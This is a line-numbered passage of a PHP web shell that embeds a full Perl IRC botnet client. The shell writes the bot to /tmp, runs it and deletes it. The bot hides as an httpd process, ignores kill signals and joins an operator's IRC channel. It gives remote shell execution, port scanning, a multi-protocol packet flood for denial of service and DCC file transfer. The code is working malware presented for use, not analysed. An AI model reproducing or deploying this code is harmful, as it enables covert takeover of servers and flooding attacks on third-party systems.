  2682. echo "Now Connecting to <b><font color=\"red\">$ircserver</font></b> in <b><font color=\"yellow\">$ircchan</font></b> Andministrators: <b><font color=\"yellow\">$ircadmin</font></b> Botname is <b><font color=\"yellow\">$irclabel</font></b>";
  2683. echo "<p>Dont Forget to Delete Loader.pl in /tmp</p>";
  2684. #######################################################
  2685. ######################IRC Trojan##########################
  2686. $file="
  2687. ################ CONFIGURACAO #################################################################
  2688. my \$processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
  2689. #----------------------------------------------################################################
  2690. my \$linas_max='48'; # Evita o flood :) depois de X linhas #
  2691. #----------------------------------------------################################################
  2692. my \$sleep='4'; # ele dorme X segundos #
  2693. ##################### IRC #####################################################################
  2694. my @adms=(\"$ircadmin\"); # Nick do administrador #
  2695. #----------------------------------------------################################################
  2696. my @canais=(\"$ircchan\"); # Caso haja senha (\"#canal :senha\") #
  2697. #----------------------------------------------################################################
  2698. my \$nick='$irclabel'; # Nick do bot. Caso esteja em uso vai aparecer #
  2699.                                               # aparecer com numero radonamico no final #
  2700. #----------------------------------------------################################################
  2701. my \$ircname = 'Linux'; # User ID #
  2702. #----------------------------------------------################################################
  2703. chop (my \$realname = `uname -a`); # Full Name #
  2704. #----------------------------------------------################################################
  2705. \$servidor='$ircserver' unless \$servidor; # Servidor de irc que vai ser usado #
  2706.                                               # caso n?o seja especificado no argumento #
  2707. #----------------------------------------------################################################
  2708. my \$porta='6667'; # Porta do servidor de irc #
  2709. ################ ACESSO A SHELL ###############################################################
  2710. my \$secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
  2711. ###############################################################################################
  2712. my \$VERSAO = '0.2';
  2713. \$SIG{'INT'} = 'IGNORE';
  2714. \$SIG{'HUP'} = 'IGNORE';
  2715. \$SIG{'TERM'} = 'IGNORE';
  2716. \$SIG{'CHLD'} = 'IGNORE';
  2717. \$SIG{'PS'} = 'IGNORE';
  2718. \$SIG{'STOP'} = 'IGNORE';
  2719. use IO::Socket;
  2720. use Socket;
  2721. use IO::Select;
  2722. chdir(\"/\");
  2723. \$servidor=\"\$ARGV[0]\" if \$ARGV[0];
  2724. $0=\"\$processo\".\"\0\"x16;;
  2725. my \$pid=fork;
  2726. exit if \$pid;
  2727. die \"Problema com o fork: $!\" unless defined(\$pid);
  2728. my \$dcc_sel = new IO::Select->new();
  2729. #############################
  2730. # B0tchZ na veia ehehe :P #
  2731. #############################
  2732.  
  2733. \$sel_cliente = IO::Select->new();
  2734. sub sendraw {
  2735.  if ($#_ == '1') {
  2736.    my \$socket = \$_[0];
  2737.    print \$socket \"\$_[1]\\n\";
  2738.  } else {
  2739.      print \$IRC_cur_socket \"\$_[0]\\n\";
  2740.  }
  2741. }
  2742. #################################
  2743. sub conectar {
  2744.   my \$meunick = \$_[0];
  2745.   my \$servidor_con = \$_[1];
  2746.   my \$porta_con = \$_[2];
  2747.  
  2748.   my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
  2749.   if (defined(\$IRC_socket)) {
  2750.     \$IRC_cur_socket = \$IRC_socket;
  2751.  
  2752.     \$IRC_socket->autoflush(1);
  2753.     \$sel_cliente->add(\$IRC_socket);
  2754.  
  2755.     \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
  2756.     \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
  2757.     \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
  2758.     \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
  2759.     nick(\"\$meunick\");
  2760.     sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
  2761.     sleep 1;
  2762.   }
  2763. } #####################
  2764.  
  2765. my \$line_temp;
  2766. while( 1 ) {
  2767.   while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
  2768.   delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
  2769.   &DCC::connections;
  2770.   my @ready = \$sel_cliente->can_read(0);
  2771.   next unless(@ready);
  2772.   foreach \$fh (@ready) {
  2773.     \$IRC_cur_socket = \$fh;
  2774.     \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
  2775.     \$nread = sysread(\$fh, \$msg, 4096);
  2776.     if (\$nread == 0) {
  2777.        \$sel_cliente->remove(\$fh);
  2778.        \$fh->close;
  2779.        delete(\$irc_servers{\$fh});
  2780.     }
  2781.     @lines = split (/\\n/, \$msg);
  2782.  
  2783.     for(my \$c=0; \$c<= $#lines; \$c++) {
  2784.       \$line = \$lines[\$c];
  2785.       \$line=\$line_temp.\$line if (\$line_temp);
  2786.       \$line_temp='';
  2787.       \$line =~ s/\\r$//;
  2788.       unless (\$c == $#lines) {
  2789.         parse(\"\$line\");
  2790.       } else {
  2791.           if ($#lines == 0) {
  2792.             parse(\"\$line\");
  2793.           } elsif (\$lines[\$c] =~ /\\r$/) {
  2794.               parse(\"\$line\");
  2795.           } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  2796.               parse(\"\$line\");
  2797.           } else {
  2798.               \$line_temp = \$line;
  2799.           }
  2800.       }
  2801.      }
  2802.   }
  2803. }
  2804.  
  2805. #########################
  2806.  
  2807.  
  2808. sub parse {
  2809.   my \$servarg = shift;
  2810.   if (\$servarg =~ /^PING \:(.*)/) {
  2811.     sendraw(\"PONG :$1\");
  2812.   } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  2813.       my \$pn=$1; my \$onde = $4; my \$args = $5;
  2814.       if (\$args =~ /^\\001VERSION\\001$/) {
  2815.         notice(\"\$pn\", \"\\001VERSION ShellBOT-\$VERSAO por 0ldW0lf\\001\");
  2816.       }
  2817.       if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
  2818.         if (\$onde eq \"\$meunick\"){
  2819.           shell(\"\$pn\", \"\$args\");
  2820.         }
  2821.         if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) {
  2822.            my \$natrix = $1;
  2823.            my \$arg = $2;
  2824.            if (\$arg =~ /^\!(.*)/) {
  2825.              ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
  2826.            } elsif (\$arg =~ /^\@(.*)/) {
  2827.                \$ondep = \$onde;
  2828.                \$ondep = \$pn if \$onde eq \$meunick;
  2829.                bfunc(\"\$ondep\",\"$1\");
  2830.            } else {
  2831.                shell(\"\$onde\", \"\$arg\");
  2832.            }
  2833.         }
  2834.       }
  2835.   } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  2836.       if (lc($1) eq lc(\$meunick)) {
  2837.         \$meunick=$4;
  2838.         \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
  2839.       }
  2840.   } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
  2841.       nick(\"\$meunick\".int rand(9999));
  2842.   } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  2843.       \$meunick = $2;
  2844.       \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
  2845.       \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
  2846.       foreach my \$canal (@canais) {
  2847.         sendraw(\"JOIN \$canal\");
  2848.       }
  2849.   }
  2850. }
  2851. ##########################
  2852.  
  2853. sub bfunc {
  2854.  my \$printl = \$_[0];
  2855.  my \$funcarg = \$_[1];
  2856.  if (my \$pid = fork) {
  2857.     waitpid(\$pid, 0);
  2858.  } else {
  2859.      if (fork) {
  2860.         exit;
  2861.       } else {
  2862.           if (\$funcarg =~ /^portscan (.*)/) {
  2863.             my \$hostip=\"$1\";
  2864.             my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
  2865.             my (@aberta, %porta_banner);
  2866.             foreach my \$porta (@portas) {
  2867.                my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
  2868.                if (\$scansock) {
  2869.                   push (@aberta, \$porta);
  2870.                   \$scansock->close;
  2871.                }
  2872.             }
  2873.  
  2874.             if (@aberta) {
  2875.               sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
  2876.             } else {
  2877.                 sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
  2878.             }
  2879.           }
  2880.           if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
  2881.             my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
  2882.             \$dtime = 1 if \$dtime == 0;
  2883.             my %bytes;
  2884.             \$bytes{igmp} = $2 * \$pacotes{igmp};
  2885.             \$bytes{icmp} = $2 * \$pacotes{icmp};
  2886.             \$bytes{o} = $2 * \$pacotes{o};
  2887.             \$bytes{udp} = $2 * \$pacotes{udp};
  2888.             \$bytes{tcp} = $2 * \$pacotes{tcp};
  2889.  
  2890.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002 - Status GERAL -\\002\");
  2891.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Tempo\\002: \$dtime\".\"s\");
  2892.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total pacotes\\002: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
  2893.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Total bytes\\002: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
  2894.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\\002Média de envio\\002: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
  2895.  
  2896.           }
  2897.           exit;
  2898.       }
  2899.  }
  2900. }
  2901. ##########################
  2902.  
  2903.  
  2904. sub ircase {
  2905.  my (\$kem, \$printl, \$case) = @_;
  2906.  
  2907.  
  2908.  if (\$case =~ /^join (.*)/) {
  2909.     j(\"$1\");
  2910.   }
  2911.   if (\$case =~ /^part (.*)/) {
  2912.      p(\"$1\");
  2913.   }
  2914.   if (\$case =~ /^rejoin\s+(.*)/) {
  2915.      my \$chan = $1;
  2916.      if (\$chan =~ /^(\d+) (.*)/) {
  2917.        for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
  2918.          p(\"$2\");
  2919.          j(\"$2\");
  2920.        }
  2921.      } else {
  2922.          p(\"\$chan\");
  2923.          j(\"\$chan\");
  2924.      }
  2925.   }
  2926.   if (\$case =~ /^op/) {
  2927.      op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
  2928.      my \$oarg = substr(\$case, 3);
  2929.      op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2930.   }
  2931.   if (\$case =~ /^deop/) {
  2932.      deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
  2933.      my \$oarg = substr(\$case, 5);
  2934.      deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2935.   }
  2936.   if (\$case =~ /^voice/) {
  2937.      voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
  2938.      \$oarg = substr(\$case, 6);
  2939.      voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2940.   }
  2941.   if (\$case =~ /^devoice/) {
  2942.      devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
  2943.      \$oarg = substr(\$case, 8);
  2944.      devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
  2945.   }
  2946.   if (\$case =~ /^msg\s+(\S+) (.*)/) {
  2947.      msg(\"$1\", \"$2\");
  2948.   }
  2949.   if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  2950.      for (my \$cf = 1; \$cf <= $1; \$cf++) {
  2951.        msg(\"$2\", \"$3\");
  2952.      }
  2953.   }
  2954.   if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
  2955.      ctcp(\"$1\", \"$2\");
  2956.   }
  2957.   if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  2958.      for (my \$cf = 1; \$cf <= $1; \$cf++) {
  2959.        ctcp(\"$2\", \"$3\");
  2960.      }
  2961.   }
  2962.   if (\$case =~ /^invite\s+(\S+) (.*)/) {
  2963.      invite(\"$1\", \"$2\");
  2964.   }
  2965.   if (\$case =~ /^nick (.*)/) {
  2966.      nick(\"$1\");
  2967.   }
  2968.   if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
  2969.       conectar(\"$2\", \"$1\", 6667);
  2970.   }
  2971.   if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
  2972.      DCC::SEND(\"$1\", \"$2\");
  2973.   }
  2974.   if (\$case =~ /^raw (.*)/) {
  2975.      sendraw(\"$1\");
  2976.   }
  2977.   if (\$case =~ /^eval (.*)/) {
  2978.     eval \"$1\";
  2979.   }
  2980. }
  2981. ##########################
  2982.  
  2983. sub shell {
  2984.  return unless \$secv;
  2985.  my \$printl=\$_[0];
  2986.  my \$comando=\$_[1];
  2987.  if (\$comando =~ /cd (.*)/) {
  2988.    chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench :D \");
  2989.    return;
  2990.  }
  2991.  elsif (\$pid = fork) {
  2992.     waitpid(\$pid, 0);
  2993.  } else {
  2994.      if (fork) {
  2995.         exit;
  2996.       } else {
  2997.           my @resp=`\$comando 2>&1 3>&1`;
  2998.           my \$c=0;
  2999.           foreach my \$linha (@resp) {
  3000.             \$c++;
  3001.             chop \$linha;
  3002.             sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
  3003.             if (\$c == \"\$linas_max\") {
  3004.               \$c=0;
  3005.               sleep \$sleep;
  3006.             }
  3007.           }
  3008.           exit;
  3009.       }
  3010.  }
  3011. }
  3012.  
  3013. #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
  3014. sub attacker {
  3015.  my \$iaddr = inet_aton(\$_[0]);
  3016.  my \$msg = 'B' x \$_[1];
  3017.  my \$ftime = \$_[2];
  3018.  my \$cp = 0;
  3019.  my (%pacotes);
  3020.  \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
  3021.  
  3022.  socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
  3023.  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
  3024.  socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
  3025.  socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
  3026.  return(undef) if \$cp == 4;
  3027.  my \$itime = time;
  3028.  my (\$cur_time);
  3029.  while ( 1 ) {
  3030.     for (my \$porta = 1; \$porta <= 65535; \$porta++) {
  3031.       \$cur_time = time - \$itime;
  3032.       last if \$cur_time >= \$ftime;
  3033.       send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
  3034.       send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
  3035.       send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
  3036.       send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
  3037.  
  3038.       # DoS ?? :P
  3039.       for (my \$pc = 3; \$pc <= 255;\$pc++) {
  3040.         next if \$pc == 6;
  3041.         \$cur_time = time - \$itime;
  3042.         last if \$cur_time >= \$ftime;
  3043.         socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
  3044.         send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
  3045.       }
  3046.     }
  3047.     last if \$cur_time >= \$ftime;
  3048.  }
  3049.  return(\$cur_time, %pacotes);
  3050. }
  3051.  
  3052. #############
  3053. # ALIASES #
  3054. #############
  3055.  
  3056. sub action {
  3057.   return unless $#_ == 1;
  3058.   sendraw(\"PRIVMSG \$_[0] :\\001ACTION \$_[1]\\001\");
  3059. }
  3060.  
  3061. sub ctcp {
  3062.   return unless $#_ == 1;
  3063.   sendraw(\"PRIVMSG \$_[0] :\\001\$_[1]\\001\");
  3064. }
  3065. sub msg {
  3066.   return unless $#_ == 1;
  3067.   sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
  3068. }
  3069.  
  3070. sub notice {
  3071.   return unless $#_ == 1;
  3072.   sendraw(\"NOTICE \$_[0] :\$_[1]\");
  3073. }
  3074.  
  3075. sub op {
  3076.   return unless $#_ == 1;
  3077.   sendraw(\"MODE \$_[0] +o \$_[1]\");
  3078. }
  3079. sub deop {
  3080.   return unless $#_ == 1;
  3081.   sendraw(\"MODE \$_[0] -o \$_[1]\");
  3082. }
  3083. sub hop {
  3084.    return unless $#_ == 1;
  3085.   sendraw(\"MODE \$_[0] +h \$_[1]\");
  3086. }
  3087. sub dehop {
  3088.   return unless $#_ == 1;
  3089.   sendraw(\"MODE \$_[0] +h \$_[1]\");
  3090. }
  3091. sub voice {
  3092.   return unless $#_ == 1;
  3093.   sendraw(\"MODE \$_[0] +v \$_[1]\");
  3094. }
  3095. sub devoice {
  3096.   return unless $#_ == 1;
  3097.   sendraw(\"MODE \$_[0] -v \$_[1]\");
  3098. }
  3099. sub ban {
  3100.   return unless $#_ == 1;
  3101.   sendraw(\"MODE \$_[0] +b \$_[1]\");
  3102. }
  3103. sub unban {
  3104.   return unless $#_ == 1;
  3105.   sendraw(\"MODE \$_[0] -b \$_[1]\");
  3106. }
  3107. sub kick {
  3108.   return unless $#_ == 1;
  3109.   sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
  3110. }
  3111.  
  3112. sub modo {
  3113.   return unless $#_ == 0;
  3114.   sendraw(\"MODE \$_[0] \$_[1]\");
  3115. }
  3116. sub mode { modo(@_); }
  3117.  
  3118. sub j { &join(@_); }
  3119. sub join {
  3120.   return unless $#_ == 0;
  3121.   sendraw(\"JOIN \$_[0]\");
  3122. }
  3123. sub p { part(@_); }
  3124. sub part {sendraw(\"PART \$_[0]\");}
  3125.  
  3126. sub nick {
  3127.  return unless $#_ == 0;
  3128.  sendraw(\"NICK \$_[0]\");
  3129. }
  3130.  
  3131. sub invite {
  3132.   return unless $#_ == 1;
  3133.   sendraw(\"INVITE \$_[1] \$_[0]\");
  3134. }
  3135. sub topico {
  3136.   return unless $#_ == 1;
  3137.   sendraw(\"TOPIC \$_[0] \$_[1]\");
  3138. }
  3139. sub topic { topico(@_); }
  3140.  
  3141. sub whois {
  3142.  return unless $#_ == 0;
  3143.  sendraw(\"WHOIS \$_[0]\");
  3144. }
  3145. sub who {
  3146.  return unless $#_ == 0;
  3147.  sendraw(\"WHO \$_[0]\");
  3148. }
  3149. sub names {
  3150.  return unless $#_ == 0;
  3151.  sendraw(\"NAMES \$_[0]\");
  3152. }
  3153. sub away {
  3154.  sendraw(\"AWAY \$_[0]\");
  3155. }
  3156. sub back { away(); }
  3157. sub quit {
  3158.  sendraw(\"QUIT :\$_[0]\");
  3159. }
  3160.  
  3161. # DCC
  3162. #########################
  3163.  
  3164. package DCC;
  3165.  
  3166. sub connections {
  3167.   my @ready = \$dcc_sel->can_read(1);
  3168. # return unless (@ready);
  3169.   foreach my \$fh (@ready) {
  3170.     my \$dcctipo = \$DCC{\$fh}{tipo};
  3171.     my \$arquivo = \$DCC{\$fh}{arquivo};
  3172.     my \$bytes = \$DCC{\$fh}{bytes};
  3173.     my \$cur_byte = \$DCC{\$fh}{curbyte};
  3174.     my \$nick = \$DCC{\$fh}{nick};
  3175.  
  3176.  
  3177.     my \$msg;
  3178.     my \$nread = sysread(\$fh, \$msg, 10240);
  3179.  
  3180.     if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) {
  3181.        \$DCC{\$fh}{status} = \"Cancelado\";
  3182.        \$DCC{\$fh}{ftime} = time;
  3183.        \$dcc_sel->remove(\$fh);
  3184.        \$fh->close;
  3185.        next;
  3186.     }
  3187.  
  3188.     if (\$dcctipo eq \"get\") {
  3189.        \$DCC{\$fh}{curbyte} += length(\$msg);
  3190.  
  3191.        my \$cur_byte = \$DCC{\$fh}{curbyte};
  3192.  
  3193.        open(FILE, \">> \$arquivo\");
  3194.        print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
  3195.        close(FILE);
  3196.  
  3197.        my \$packbyte = pack(\"N\", \$cur_byte);
  3198.        print \$fh \"\$packbyte\";
  3199.  
  3200.  
  3201.        if (\$bytes == \$cur_byte) {
  3202.           \$dcc_sel->remove(\$fh);
  3203.           \$fh->close;
  3204.           \$DCC{\$fh}{status} = \"Recebido\";
  3205.           \$DCC{\$fh}{ftime} = time;
  3206.           next;
  3207.        }
  3208.     } elsif (\$dcctipo eq \"send\") {
  3209.          my \$send = \$fh->accept;
  3210.          \$send->autoflush(1);
  3211.          \$dcc_sel->add(\$send);
  3212.          \$dcc_sel->remove(\$fh);
  3213.          \$DCC{\$send}{tipo} = 'sendcon';
  3214.          \$DCC{\$send}{itime} = time;
  3215.          \$DCC{\$send}{nick} = \$nick;
  3216.          \$DCC{\$send}{bytes} = \$bytes;
  3217.          \$DCC{\$send}{curbyte} = 0;
  3218.          \$DCC{\$send}{arquivo} = \$arquivo;
  3219.          \$DCC{\$send}{ip} = \$send->peerhost;
  3220.          \$DCC{\$send}{porta} = \$send->peerport;
  3221.          \$DCC{\$send}{status} = \"Enviando\";
  3222.          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
  3223.          open(FILE, \"< \$arquivo\");
  3224.          my \$fbytes;
  3225.          read(FILE, \$fbytes, 1024);
  3226.          print \$send \"\$fbytes\";
  3227.          close FILE;
  3228. # delete(\$DCC{\$fh});
  3229. } elsif (\$dcctipo eq 'sendcon') {
  3230.          my \$bytes_sended = unpack(\"N\", \$msg);
  3231.          \$DCC{\$fh}{curbyte} = \$bytes_sended;
  3232.          if (\$bytes_sended == \$bytes) {
  3233.             \$fh->close;
  3234.             \$dcc_sel->remove(\$fh);
  3235.             \$DCC{\$fh}{status} = \"Enviado\";
  3236.             \$DCC{\$fh}{ftime} = time;
  3237.             next;
  3238.          }
  3239.          open(SENDFILE, \"< \$arquivo\");
  3240.          seek(SENDFILE, \$bytes_sended, 0);
  3241.          my \$send_bytes;
  3242.          read(SENDFILE, \$send_bytes, 1024);
  3243.          print \$fh \"\$send_bytes\";
  3244.          close(SENDFILE);
  3245.     }
  3246.   }
  3247. }
  3248. ##########################
  3249.  
  3250. sub SEND {
  3251.  my (\$nick, \$arquivo) = @_;
  3252.  unless (-r \"\$arquivo\") {
  3253.    return(0);
  3254.  }
  3255.  
  3256.  my \$dccark = \$arquivo;
  3257.  \$dccark =~ s/[.*\/](\S+)/$1/;
  3258.  
  3259.  my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
  3260.  my \$longip = unpack(\"N\",inet_aton(\$meuip));
  3261.  
  3262.  my @filestat = stat(\$arquivo);
  3263.  my \$size_total=\$filestat[7];
  3264.  if (\$size_total == 0) {
  3265.     return(0);
  3266.  }
  3267.  
  3268.  my (\$porta, \$sendsock);
  3269.  do {
  3270.    \$porta = int rand(64511);
  3271.    \$porta += 1024;
  3272.    \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
  3273.  } until \$sendsock;
  3274.  
  3275.  \$DCC{\$sendsock}{tipo} = 'send';
  3276.  \$DCC{\$sendsock}{nick} = \$nick;
  3277.  \$DCC{\$sendsock}{bytes} = \$size_total;
  3278.  \$DCC{\$sendsock}{arquivo} = \$arquivo;
  3279.  
  3280.  &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
  3281.  
  3282. }
  3283.  
  3284. sub GET {
  3285.  my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
  3286.  return(0) if (-e \"\$arquivo\");
  3287.  if (open(FILE, \"> \$arquivo\")) {
  3288.     close FILE;
  3289.  } else {
  3290.    return(0);
  3291.  }
  3292.  
  3293.  my \$dccip=fixaddr(\$dcclongip);
  3294.  return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
  3295.  my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
  3296.  \$dccsock->autoflush(1);
  3297.  \$dcc_sel->add(\$dccsock);
  3298.  \$DCC{\$dccsock}{tipo} = 'get';
  3299.  \$DCC{\$dccsock}{itime} = time;
  3300.  \$DCC{\$dccsock}{nick} = \$nick;
  3301.  \$DCC{\$dccsock}{bytes} = \$bytes;
  3302.  \$DCC{\$dccsock}{curbyte} = 0;
  3303.  \$DCC{\$dccsock}{arquivo} = \$arquivo;
  3304.  \$DCC{\$dccsock}{ip} = \$dccip;
  3305.  \$DCC{\$dccsock}{porta} = \$dccporta;
  3306.  \$DCC{\$dccsock}{status} = \"Recebendo\";
  3307. }
  3308. ############################
  3309. # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
  3310. sub Status {
  3311.  my \$socket = shift;
  3312.  my \$sock_tipo = \$DCC{\$socket}{tipo};
  3313.  unless (lc(\$sock_tipo) eq \"chat\") {
  3314.    my \$nick = \$DCC{\$socket}{nick};
  3315.    my \$arquivo = \$DCC{\$socket}{arquivo};
  3316.    my \$itime = \$DCC{\$socket}{itime};
  3317.    my \$ftime = time;
  3318.    my \$status = \$DCC{\$socket}{status};
  3319.    \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
  3320.  
  3321.    my \$d_time = \$ftime-\$itime;
  3322.  
  3323.    my \$cur_byte = \$DCC{\$socket}{curbyte};
  3324.    my \$bytes_total = \$DCC{\$socket}{bytes};
  3325.  
  3326.    my \$rate = 0;
  3327.    \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
  3328.    my \$porcen = (\$cur_byte*100)/\$bytes_total;
  3329.  
  3330.    my (\$r_duv, \$p_duv);
  3331.    if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
  3332.       \$r_duv = $3; \$r_duv++ if $4 >= 5;
  3333.       \$rate = \"$1\.$2\".\"\$r_duv\";
  3334.    }
  3335.    if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
  3336.       \$p_duv = $3; \$p_duv++ if $4 >= 5;
  3337.       \$porcen = \"$1\.$2\".\"\$p_duv\";
  3338.    }
  3339.    return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
  3340.  }
  3341.  
  3342.  return(0);
  3343. }
  3344.  
  3345. # esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
  3346. sub fixaddr {
  3347.    my (\$address) = @_;
  3348.  
  3349.    chomp \$address; # just in case, sigh.
  3350.    if (\$address =~ /^\d+$/) {
  3351.        return inet_ntoa(pack \"N\", \$address);
  3352.    } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
  3353.        return \$address;
  3354.    } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
  3355.        return inet_ntoa(((gethostbyname(\$address))[4])[0]);
  3356.    } else {
  3357.        return;
  3358.    }
  3359. }
  3360. ############################
  3361. ";
  3362. $bot = "/tmp/ircs.pl";
  3363. $open = fopen($bot,"w");
  3364. fputs($open,$file);
  3365. fclose($open);
  3366. $cmd="perl $bot";
  3367. $cmd2="rm $bot";
  3368. system($cmd);
  3369. system($cmd2);
  3370. $_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
  3371.  
  3372. }
  3373.  
  3374. if($unix)
  3375.  {
  3376.  if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
  3377.  if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
  3378.  if($safe_mode) { $sysctl = '-'; }
  3379.  else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
  3380.  else
  3381.   {
  3382.    $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
  3383.    if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
  3384.    if(empty($sysctl)) { $sysctl = '-'; }
  3385.    setcookie('sysctl',$sysctl);
  3386.   }
  3387.  }
  3388. echo $head;
  3389. echo '</head>';
  3390. if(empty($_POST['cmd'])) {
  3391. $serv = array(127,192,172,10);
  3392. $addr=@explode('.', $_SERVER['SERVER_ADDR']);
  3393. $current_version = str_replace('.','',$version);
  3394. if (!in_array($addr[0], $serv)) {
  3395. @print "<img src=\"http://127.0.0.1/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
  3396. @readfile ("http://127.0.0.1/version.php?version=".$current_version."");}}
